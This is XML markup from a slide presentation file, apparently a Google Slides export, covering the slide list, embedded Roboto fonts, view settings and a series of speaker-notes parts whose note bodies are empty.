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1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId29"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="282" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="284" r:id="rId14"/>
    <p:sldId id="280" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="273" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="275" r:id="rId25"/>
    <p:sldId id="276" r:id="rId26"/>
    <p:sldId id="283" r:id="rId27"/>
    <p:sldId id="277" r:id="rId28"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6888163" cy="10018713"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
      <p:italic r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId36"/>
      <p:bold r:id="rId37"/>
      <p:italic r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="02000000000000000000"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9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="2232">
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>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FF4F696-85C8-45BD-83F6-7E31E192685C}">
  <a:tblStyle styleId="{FFF4F696-85C8-45BD-83F6-7E31E192685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20"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="2232"/>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4775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591"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8798eb4c44_0_0:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_0:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8623a2bef4_0_1:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_0_1:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8623a2bef4_1_67:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_1_67:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8623a2bef4_1_89:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_1_89:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8623a2bef4_1_89:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_1_89:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2744084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8623a2bef4_1_89:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_1_89:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1023640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8798eb4c44_0_83:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_83:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8623a2bef4_1_135:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_1_135:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8623a2bef4_1_148:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_1_148:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8623a2bef4_1_159:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_1_159:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8623a2bef4_1_170:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_1_170:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8623a2bef4_1_0:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8623a2bef4_1_0:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_154:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_154:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_159:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_159:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_169:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_169:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_182:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_182:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_193:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_193:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_205:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_205:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_216:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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 name="Google Shape;1244;g8798eb4c44_0_216:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">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80f7e6291e_1_107:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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80f7e6291e_1_107:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_15:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_15:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_25:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_25:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_30:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_30:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_44:notes"/>
          <p:cNvSpPr>
